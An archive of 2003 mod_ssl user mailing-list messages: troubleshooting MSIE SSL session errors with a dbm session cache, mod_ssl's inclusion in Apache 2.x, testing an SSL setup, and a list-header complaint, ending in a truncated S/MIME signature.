	by master.modssl.org (Postfix) with ESMTP id 053C92AA015
	for ; Wed, 23 Apr 2003 20:33:11 +0200 (CEST)
Received: by toftum.dk (Postfix, from userid 1001)
	id 5F2126E418B; Wed, 23 Apr 2003 20:33:06 +0200 (CEST)
Date: Wed, 23 Apr 2003 20:33:06 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: SSLSessionCache and MSIE "Page Not Found" problems
Message-ID: <20030423183306.GC25121@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Wed, Apr 23, 2003 at 01:08:49PM -0500, Derrick Fogle wrote:
> Hello list,
> 
> I'm having a problem with Apache/mod-ssl that I'm unable to figure out. 
> An unreasonably high number of users trying to access the site with 
> Win/MSIE get "Page Not Found" errors. When we look in the logs, what I 
> see is subsequent SSL connections after the initial session 
> establishment failing. The user can click their "Back" button, try the 
> form submit again, and the server will eventually give up, issue the 
> user a new SSL session, and the user's action will take. Then the next 
> form submit, the problem starts again. It is usually people behind 
> firewalls that have the problem, and any one given user will either not 
> have the problem at all, or tend to have lots of problems with it.
> 
Using which type of SSLSessionCache? 

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr 23 20:39:41 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 1F4302AA030; Wed, 23 Apr 2003 20:39:41 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from foundationcomputing.net (donorport.org [207.160.174.56])
	by master.modssl.org (Postfix) with ESMTP id B72312AA023
	for ; Wed, 23 Apr 2003 20:39:39 +0200 (CEST)
Received: from [207.160.174.20] (HELO foundationcomputing.com)
  by foundationcomputing.net (CommuniGate Pro SMTP 3.5.8)
  with ESMTP id 3462761 for modssl-users@modssl.org; Wed, 23 Apr 2003 12:39:09 -0600
Date: Wed, 23 Apr 2003 13:39:38 -0500
Subject: Re: SSLSessionCache and MSIE "Page Not Found" problems
Content-Type: text/plain; charset=US-ASCII; format=flowed
Mime-Version: 1.0 (Apple Message framework v552)
From: Derrick Fogle 
To: modssl-users@modssl.org
Content-Transfer-Encoding: 7bit
In-Reply-To: <20030423183306.GC25121@toftum.dk>
Message-Id: 
X-Mailer: Apple Mail (2.552)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Derrick Fogle 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Wednesday, April 23, 2003, at 01:33 PM, Mads Toftum wrote:

> Using which type of SSLSessionCache?

SSLSessionCache         dbm:/usr/local/apache/logs/ssl_scache

-Derrick

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr 23 20:41:33 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 1D2D52AA026; Wed, 23 Apr 2003 20:41:33 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [209.170.144.33])
	by master.modssl.org (Postfix) with ESMTP id B36532AA015
	for ; Wed, 23 Apr 2003 20:41:29 +0200 (CEST)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id OAA32459
	for ; Wed, 23 Apr 2003 14:41:42 -0400
Date: Wed, 23 Apr 2003 14:41:41 -0400 (EDT)
From: "R. DuFresne" 
To: modssl-users@modssl.org
Subject: Re: SSLSessionCache and MSIE "Page Not Found" problems
In-Reply-To: 
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Sounds like a point at which you now need to make contact with those
firewall guru's and network folks at the other ends where users are having
troubles to see if you can lock it down to a particular firewall product
or setup that is causing these troubles.  The pix, doing NAT/PAT seems to
do some funky things we've had to learn to work around, though, I've also
seen other firewals, still doing NAT/PAT translations do similiar things
now and then.  Course, hopefully those you do make contact with are indeed
guru's, working for a sta government, wee;ve found that few are, most tend
to know enough to put it in, turn it on and let it run.  Have you
documented whether or not the troubled sites coming at you are doing more
then mere firewalling, like NAT/PAT translations and or proxying?

Thanks,

Ron DuFresne


On Wed, 23 Apr 2003, Derrick Fogle wrote:

> Hello list,
> 
> I'm having a problem with Apache/mod-ssl that I'm unable to figure out. 
> An unreasonably high number of users trying to access the site with 
> Win/MSIE get "Page Not Found" errors. When we look in the logs, what I 
> see is subsequent SSL connections after the initial session 
> establishment failing. The user can click their "Back" button, try the 
> form submit again, and the server will eventually give up, issue the 
> user a new SSL session, and the user's action will take. Then the next 
> form submit, the problem starts again. It is usually people behind 
> firewalls that have the problem, and any one given user will either not 
> have the problem at all, or tend to have lots of problems with it.
> 
> My boss is on me about this, I'm more or less a newbie/dabbler, and my 
> Linux server admin guy says he's looked into the problem and can't come 
> up with a reason why or a resolution. But these users can go to other 
> secure sites and not have the problem.
> 
> I need help, and I'm willing to pay to have the problem fixed. Please 
> advise on where to go from here.
> 
> Thanks,
> 
> -Derrick Fogle
> -Technology Coordinator
> -MO Lions Eye Research Foundation
> -404 Portland St, Columbia MO 65201
> -573-443-1471
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr 23 20:46:53 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 37EC82AA026; Wed, 23 Apr 2003 20:46:53 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id 49B322AA015
	for ; Wed, 23 Apr 2003 20:46:52 +0200 (CEST)
Received: by toftum.dk (Postfix, from userid 1001)
	id C579D6E418B; Wed, 23 Apr 2003 20:46:51 +0200 (CEST)
Date: Wed, 23 Apr 2003 20:46:51 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: SSLSessionCache and MSIE "Page Not Found" problems
Message-ID: <20030423184651.GD25121@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <20030423183306.GC25121@toftum.dk> 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Wed, Apr 23, 2003 at 01:39:38PM -0500, Derrick Fogle wrote:
> On Wednesday, April 23, 2003, at 01:33 PM, Mads Toftum wrote:
> 
> SSLSessionCache         dbm:/usr/local/apache/logs/ssl_scache
> 
I've seen similar problems a long time ago - I would recommend
installing the MM library and using an shm based session cache.

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr 23 21:11:51 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 99D0B2AA023; Wed, 23 Apr 2003 21:11:51 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from foundationcomputing.net (donorport.org [207.160.174.56])
	by master.modssl.org (Postfix) with ESMTP id 2FFB02AA015
	for ; Wed, 23 Apr 2003 21:11:50 +0200 (CEST)
Received: from [207.160.174.20] (HELO foundationcomputing.com)
  by foundationcomputing.net (CommuniGate Pro SMTP 3.5.8)
  with ESMTP id 3462793 for modssl-users@modssl.org; Wed, 23 Apr 2003 13:11:20 -0600
Date: Wed, 23 Apr 2003 14:11:49 -0500
Subject: Re: SSLSessionCache and MSIE "Page Not Found" problems
Content-Type: text/plain; charset=US-ASCII; format=flowed
Mime-Version: 1.0 (Apple Message framework v552)
From: Derrick Fogle 
To: modssl-users@modssl.org
Content-Transfer-Encoding: 7bit
In-Reply-To: <20030423184651.GD25121@toftum.dk>
Message-Id: <6EE0AE0D-75BF-11D7-8A9E-000393C7877A@foundationcomputing.com>
X-Mailer: Apple Mail (2.552)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Derrick Fogle 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Wednesday, April 23, 2003, at 01:46 PM, Mads Toftum wrote:

> On Wed, Apr 23, 2003 at 01:39:38PM -0500, Derrick Fogle wrote:
>> On Wednesday, April 23, 2003, at 01:33 PM, Mads Toftum wrote:
>>
>> SSLSessionCache         dbm:/usr/local/apache/logs/ssl_scache
>>
> I've seen similar problems a long time ago - I would recommend
> installing the MM library and using an shm based session cache.

Thanks for the suggestions everyone. I think I've got enough to chew on 
for now.

-Derrick

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr 23 22:05:25 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7C3222AA023; Wed, 23 Apr 2003 22:05:25 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from PHSEXCHICO2.Partners.org (phsexchico2.partners.org [170.223.254.20])
	by master.modssl.org (Postfix) with ESMTP id 1D6862AA015
	for ; Wed, 23 Apr 2003 22:05:24 +0200 (CEST)
Received: by phsexchico2.partners.org with Internet Mail Service (5.5.2655.55)
	id <2JPQ4YDY>; Wed, 23 Apr 2003 16:05:23 -0400
Message-ID: <5593DA408212D511B0910002A513501F06558DD7@phsexch20.mgh.harvard.edu>
From: "Kaplan, Andrew H." 
To: "'modssl-users@modssl.org'" 
Subject: Mod-SSL and Apache 2.0.45 compatibility
Date: Wed, 23 Apr 2003 16:05:21 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2655.55)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Kaplan, Andrew H." 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Is, or will, modssl be capable of running on an Apache 2.0.45 server?
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr 23 22:09:09 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A61252AA026; Wed, 23 Apr 2003 22:09:09 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id BC9872AA019
	for ; Wed, 23 Apr 2003 22:09:08 +0200 (CEST)
Received: by toftum.dk (Postfix, from userid 1001)
	id 51E706E418B; Wed, 23 Apr 2003 22:09:08 +0200 (CEST)
Date: Wed, 23 Apr 2003 22:09:08 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: Mod-SSL and Apache 2.0.45 compatibility
Message-ID: <20030423200908.GF25121@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <5593DA408212D511B0910002A513501F06558DD7@phsexch20.mgh.harvard.edu>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <5593DA408212D511B0910002A513501F06558DD7@phsexch20.mgh.harvard.edu>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Wed, Apr 23, 2003 at 04:05:21PM -0400, Kaplan, Andrew H. wrote:
> Is, or will, modssl be capable of running on an Apache 2.0.45 server?

Apache-2.x has mod_ssl built in - it is in the tarball, simply 
--enable-ssl when you configure apache.

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr 23 22:10:28 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 638902AA023; Wed, 23 Apr 2003 22:10:28 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [209.170.144.33])
	by master.modssl.org (Postfix) with ESMTP id A64562AA019
	for ; Wed, 23 Apr 2003 22:10:21 +0200 (CEST)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id QAA00126;
	Wed, 23 Apr 2003 16:10:31 -0400
Date: Wed, 23 Apr 2003 16:10:30 -0400 (EDT)
From: "R. DuFresne" 
To: "Kaplan, Andrew H." 
Cc: "'modssl-users@modssl.org'" 
Subject: Re: Mod-SSL and Apache 2.0.45 compatibility
In-Reply-To: <5593DA408212D511B0910002A513501F06558DD7@phsexch20.mgh.harvard.edu>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users



  no one seems to ever read the web pages they go to or
any of the docs that come with the source they are considering to binary
up...modssl is not built into apache 2.0.X, they are no longer seperate
disticnt parts that neds to be assembled into a whole.  Now, open-ssl is a
seperate part of the whole, except in most of the linux dists available
that have it as part of or in an addtional package of that dist...

Thanks,

Ron DuFresne


On Wed, 23 Apr 2003, Kaplan, Andrew H. wrote:

> Is, or will, modssl be capable of running on an Apache 2.0.45 server?
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From laurence.cotton@ntlworld.com  Fri Apr 25 17:19:32 2003
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from mta03-svc.ntlworld.com (mta03-svc.ntlworld.com [62.253.162.43])
	by master.modssl.org (Postfix) with ESMTP id A5EC92AA015
	for ; Fri, 25 Apr 2003 17:19:31 +0200 (CEST)
Received: from larrys-machine.ntlworld.com ([62.253.144.104])
          by mta03-svc.ntlworld.com
          (InterMail vM.4.01.03.37 201-229-121-137-20020806) with ESMTP
          id <20030425151925.XHQA11246.mta03-svc.ntlworld.com@larrys-machine.ntlworld.com>
          for ;
          Fri, 25 Apr 2003 16:19:25 +0100
Message-Id: <5.2.0.9.0.20030425161444.00a90838@pop.ntlworld.com>
X-Sender: laurence.cotton@pop.ntlworld.com
X-Mailer: QUALCOMM Windows Eudora Version 5.2.0.9
Date: Fri, 25 Apr 2003 16:21:04 +0100
To: ApacheModSsl 
From: Larry Cotton 
Subject: Testing Ssl
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed

Hi

I am using apache 2.0.45 and am using Redhat 8.0 kernel version 2.4.18.

I think I've managed to install and configure apache + ssl, but I'm not 
sure how I should go about testing that the ssl has been installed correctly.

Is it as simple as connecting to port 443 ? Something like :
https://localhost:443/mytest.html ? or do you need to set up some special 
test files ?

Also when I try this using my default browser (Mozilla) I get a message to 
the effect of :
Can't open this page without installing Personal Security Manager.

I assume this is a browser thing and and not an ssl problem. Does anyone 
know if this is the case and even what the Personal Security Manager is for ?

Cheers
Larry


From jks@selectacast.net  Fri Apr 25 18:25:46 2003
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from p1.selectacast.net (p1.selectacast.net [199.107.233.195])
	by master.modssl.org (Postfix) with ESMTP id DFF4F2AA019
	for ; Fri, 25 Apr 2003 18:25:45 +0200 (CEST)
Received: from localhost (jks@localhost)
	by p1.selectacast.net (8.11.6/8.9.3) with ESMTP id h3PGPg525715;
	Fri, 25 Apr 2003 12:25:42 -0400
Date: Fri, 25 Apr 2003 12:25:42 -0400 (EDT)
From: jks@selectacast.net
To: Larry Cotton 
Cc: ApacheModSsl 
Subject: Re: Testing Ssl
In-Reply-To: <5.2.0.9.0.20030425161444.00a90838@pop.ntlworld.com>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

On Fri, 25 Apr 2003, Larry Cotton wrote:

> Hi
> 
> I am using apache 2.0.45 and am using Redhat 8.0 kernel version 2.4.18.
> 
> I think I've managed to install and configure apache + ssl, but I'm not 
> sure how I should go about testing that the ssl has been installed correctly.
> 
> Is it as simple as connecting to port 443 ? Something like :
> https://localhost:443/mytest.html ? or do you need to set up some special 
> test files ?

No, that should work.
> 
> Also when I try this using my default browser (Mozilla) I get a message to 
> the effect of :
> Can't open this page without installing Personal Security Manager.
> 
> I assume this is a browser thing and and not an ssl problem. Does anyone 
> know if this is the case and even what the Personal Security Manager is for ?

Redhat for some reason decided to bundle the psm in a seperate rpm.  It's 
called mozilla-psm or something like that.  Just install it.


From babin-ebell@trustcenter.de  Fri Apr 25 18:55:40 2003
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from mystic2.trustcenter.de (mystic2.trustcenter.de [193.194.157.50])
	by master.modssl.org (Postfix) with ESMTP id ED5022AA021
	for ; Fri, 25 Apr 2003 18:55:39 +0200 (CEST)
Received: (from uucp@localhost)
	by mystic2.trustcenter.de (8.11.6+Sun/8.11.6) id h3PH5xX16414
	for ; Fri, 25 Apr 2003 19:05:59 +0200 (MEST)
Received: from venus.trustcenter.de(192.168.202.4) by mystic2.trustcenter.de via csmap (V6.0)
	id srcAAAagaOdG; Fri, 25 Apr 03 19:05:58 +0200
Received: from trustcenter.de (titan.trustcenter.de [192.168.200.244])
	by venus.trustcenter.de (8.11.0/8.11.0) with ESMTP id h3PGtbS14743;
	Fri, 25 Apr 2003 18:55:37 +0200 (MET DST)
Message-ID: <3EA96889.3090907@trustcenter.de>
Date: Fri, 25 Apr 2003 18:55:37 +0200
From: =?ISO-8859-15?Q?G=F6tz_Babin-Ebell?= 
Organization: TC TrustCenter AG
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.3) Gecko/20030312
X-Accept-Language: de-de, de, en
MIME-Version: 1.0
To: ApacheModSsl 
Subject: No X-List-Name ?
Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="------------ms070309030200030306040900"

This is a cryptographically signed message in MIME format.

--------------ms070309030200030306040900
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hello folks,

what happened with the mailing list ?

Old mails had the header line
X-List-Name: modssl-users

This is missing now.

Could it be reinserted ?

Bye

Goetz

-- 
Goetz Babin-Ebell, TC TrustCenter AG, http://www.trustcenter.de
Sonninstr. 24-28, 20097 Hamburg, Germany
Tel.: +49-(0)40 80 80 26 -0,  Fax: +49-(0)40 80 80 26 -126

--------------ms070309030200030306040900
Content-Type: application/x-pkcs7-signature; name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="smime.p7s"
Content-Description: S/MIME Cryptographic Signature

MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIIkDCC
BEQwggOtoAMCAQICDwCQHgAAAAJOQu0jEgf3pTANBgkqhkiG9w0BAQUFADCBvDELMAkGA1UE
BhMCREUxEDAOBgNVBAgTB0hhbWJ1cmcxEDAOBgNVBAcTB0hhbWJ1cmcxOjA4BgNVBAoTMVRD
IFRydXN0Q2VudGVyIGZvciBTZWN1cml0eSBpbiBEYXRhIE5ldHdvcmtzIEdtYkgxIjAgBgNV
BAsTGVRDIFRydXN0Q2VudGVyIENsYXNzIDMgQ0ExKTAnBgkqhkiG9w0BCQEWGmNlcnRpZmlj
YXRlQHRydXN0Y2VudGVyLmRlMB4XDTAzMDIxMDE0NDI1MFoXDTA0MDIxMDE0NDI1MFowgaox
CzAJBgNVBAYTAkRFMRAwDgYDVQQIEwdIYW1idXJnMRAwDgYDVQQHEwdIYW1idXJnMRowGAYD
VQQKExFUQyBUcnVzdENlbnRlciBBRzEUMBIGA1UECxMLRW50d2lja2x1bmcxGjAYBgNVBAMT
EUdvZXR6IEJhYmluLUViZWxsMSkwJwYJKoZIhvcNAQkBFhpiYWJpbi1lYmVsbEB0cnVzdGNl
bnRlci5kZTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALB6adN6EChrpAbT5KV1
ceRRIDAoGnz2gsBoFI2BwJLS+RpuIZfdJOepm4crg3X6LXrMKwSF/lshFeHrVPtLzabgLGyF
SujsJP0z3u7f4XNYCGHl4UbyPkYboIP9GC/DRtsknO1YfJUy/4yKBG4VjJ4AP6vZTEQey6jm
xelsK2ek4vwRfUjs/z9UcZmtj4ipiHP6IqFyydDTLarn1jWHUu2zFnJzryZ6mXdOUPihCOFG
D+c1KFksZ1VscgDpKygTQcIg/VItmbeFkhOj9IkboOyiVKvvfhujlxmdm9ACt22MjMrB0RAb
9TR1DgXlyofwykKAK+GM8Cu8jcKaJjvfhaMCAwEAAaOB0zCB0DAMBgNVHRMBAf8EAjAAMA4G
A1UdDwEB/wQEAwIF4DA+BglghkgBhvhCAQgEMRYvaHR0cDovL3d3dy50cnVzdGNlbnRlci5k
ZS9ndWlkZWxpbmVzL2luZGV4Lmh0bWwwEQYJYIZIAYb4QgEBBAQDAgWgMF0GCWCGSAGG+EIB
AwRQFk5odHRwczovL3d3dy50cnVzdGNlbnRlci5kZS9jZ2ktYmluL2NoZWNrLXJldi5jZ2kv
OTAxRTAwMDAwMDAyNEU0MkVEMjMxMjA3RjdBNT8wDQYJKoZIhvcNAQEFBQADgYEAObOwuCFG
0HmVvCm8llpJ3qsBqtZgFyUT0wuz8JG6CZjHn5lwvOg+8m8huKrE5oGEQIo9EwLcFLDNVsxB
CiwjX2juU3JQl2Hs2smUyHkOqg+W0COetRp+PcDAk4hk0Mth5A3bDy3FrzyhbjpYjAZTvnsY
9+QYmJm5cGWBJK9I7kIwggREMIIDraADAgECAg8AkB4AAAACTkLtIxIH96UwDQYJKoZIhvcN
AQEFBQAwgbwxCzAJBgNVBAYTAkRFMRAwDgYDVQQIEwdIYW1idXJnMRAwDgYDVQQHEwdIYW1i
dXJnMTowOAYDVQQKEzFUQyBUcnVzdENlbnRlciBmb3IgU2VjdXJpdHkgaW4gRGF0YSBOZXR3
b3JrcyBHbWJIMSIwIAYDVQQLExlUQyBUcnVzdENlbnRlciBDbGFzcyAzIENBMSkwJwYJKoZI
hvcNAQkBFhpjZXJ0aWZpY2F0ZUB0cnVzdGNlbnRlci5kZTAeFw0wMzAyMTAxNDQyNTBaFw0w
NDAyMTAxNDQyNTBaMIGqMQswCQYDVQQGEwJERTEQMA4GA1UECBMHSGFtYnVyZzEQMA4GA1UE
BxMHSGFtYnVyZzEaMBgGA1UEChMRVEMgVHJ1c3RDZW50ZXIgQUcxFDASBgNVBAsTC0VudHdp
Y2tsdW5nMRowGAYDVQQDExFHb2V0eiBCYWJpbi1FYmVsbDEpMCcGCSqGSIb3DQEJARYaYmFi
aW4tZWJlbGxAdHJ1c3RjZW50ZXIuZGUwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
AQCwemnTehAoa6QG0+SldXHkUSAwKBp89oLAaBSNgcCS0vkabiGX3STnqZuHK4N1+i16zCsE
hf5bIRXh61T7S82m4CxshUro7CT9M97u3+FzWAhh5eFG8j5GG6CD/Rgvw0bbJJztWHyVMv+M
igRuFYyeAD+r2UxEHsuo5sXpbCtnpOL8EX1I7P8/VHGZrY+IqYhz+iKhcsnQ0y2q59Y1h1Lt
sxZyc68mepl3TlD4oQjhRg/nNShZLGdVbHIA6SsoE0HCIP1SLZm3hZITo/SJG6DsolSr734b
o5cZnZvQArdtjIzKwdEQG/U0dQ4F5cqH8MpCgCvhjPArvI3CmiY734WjAgMBAAGjgdMwgdAw
DAYDVR0TAQH/BAIwADAOBgNVHQ8BAf8EBAMCBeAwPgYJYIZIAYb4QgEIBDEWL2h0dHA6Ly93
d3cudHJ1c3RjZW50ZXIuZGUvZ3VpZGVsaW5lcy9pbmRleC5odG1sMBEGCWCGSAGG+EIBAQQE
AwIFoDBdBglghkgBhvhCAQMEUBZOaHR0cHM6Ly93d3cudHJ1c3RjZW50ZXIuZGUvY2dpLWJp
bi9jaGVjay1yZXYuY2dpLzkwMUUwMDAwMDAwMjRFNDJFRDIzMTIwN0Y3QTU/MA0GCSqGSIb3
DQEBBQUAA4GBADmzsLghRtB5lbwpvJZaSd6rAarWYBclE9MLs/CRugmYx5+ZcLzoPvJvIbiq
xOaBhECKPRMC3BSwzVbMQQosI19o7lNyUJdh7NrJlMh5DqoPltAjnrUafj3AwJOIZNDLYeQN
2w8txa88oW46WIwGU757GPfkGJiZuXBlgSSvSO5CMYIEdzCCBHMCAQEwgdAwgbwxCzAJBgNV
BAYTAkRFMRAwDgYDVQQIEwdIYW1idXJnMRAwDgYDVQQHEwdIYW1idXJnMTowOAYDVQQKEzFU
QyBUcnVzdENlbnRlciBmb3IgU2VjdXJpdHkgaW4gRGF0YSBOZXR3b3JrcyBHbWJIMSIwIAYD
VQQLExlUQyBUcnVzdENlbnRlciBDbGFzcyAzIENBMSkwJwYJKoZIhvcNAQkBFhpjZXJ0aWZp
Y2F0ZUB0cnVzdGNlbnRlci5kZQIPAJAeAAAAAk5C7SMSB/elMAkGBSsOAwIaBQCgggJ7MBgG
CSqGSIb3DQEJAzELBgkqhkiG9w0BBwEwHAYJKoZIhvcNAQkFMQ8XDTAzMDQyNTE2NTUzN1ow
IwYJKoZIhvcNAQkEMRYEFGtLjV1B/bUQh6Ugppz8VH+KpmarMFIGCSqGSIb3DQEJDzFFMEMw
CgYIKoZIhvcNAwcwDgYIKoZIhvcNAwICAgCAMA0GCCqGSIb3DQMCAgFAMAcGBSsOAwIHMA0G
CCqGSIb3DQMCAgEoMIHhBgkrBgEEAYI3EAQxgdMwgdAwgbwxCzAJBgNVBAYTAkRFMRAwDgYD
VQQIEwdIYW1idXJnMRAwDgYDVQQHEwdIYW1idXJnMTowOAYDVQQKEzFUQyBUcnVzdENlbnRl
ciBmb3IgU2VjdXJpdHkgaW4gRGF0YSBOZXR3b3JrcyBHbWJIMSIwIAYDVQQLExlUQyBUcnVz
dENlbnRlciBDbGFzcyAzIENBMSkwJwYJKoZIhvcNAQkBFhpjZXJ0aWZpY2F0ZUB0cnVzdGNl
